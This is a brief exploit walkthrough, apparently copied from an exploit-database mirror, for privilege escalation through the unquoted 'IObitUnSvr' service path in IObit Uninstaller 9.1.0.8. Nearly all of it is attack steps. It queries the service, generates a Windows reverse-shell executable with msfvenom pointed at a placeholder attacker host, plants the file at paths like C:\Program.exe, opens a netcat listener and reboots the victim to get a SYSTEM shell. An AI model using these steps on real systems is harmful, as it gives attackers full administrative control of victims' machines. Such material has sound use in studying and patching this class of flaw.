IObit Uninstaller 9.1.0.8 - 'IObitUnSvr' Unquoted Service Path
https://awesome.hackpuntes.com/exploit-db/iobit-uninstaller-9.1.0.8-iobitunsvr-unquoted-service-path
Last updated
https://awesome.hackpuntes.com/exploit-db/iobit-uninstaller-9.1.0.8-iobitunsvr-unquoted-service-path
Last updated
Install vulnerable software
Windows + R
and type cmd
Execute command sc qc IObitUnSvr
BINARY_PATH_NAME
contains spaces and isn’t enclosed within quotes
Make a malicious exemsfvenom -p windows/shell_reverse_tcp LHOST=[IP-ATTACKER] LPORT=[PORT-ATTACKER] -f exe -o IObit.exe
Copy a malicious exe in some path like the following
C:\Program.exe
C:\Program Files.exe
C:\Program Files (x86)\IObit\IObit.exe
Listen on attacker machine nc -lvnp 5555
Reboot victim system
When the victim machine reboots, you will get a reverse shell with admin system privileges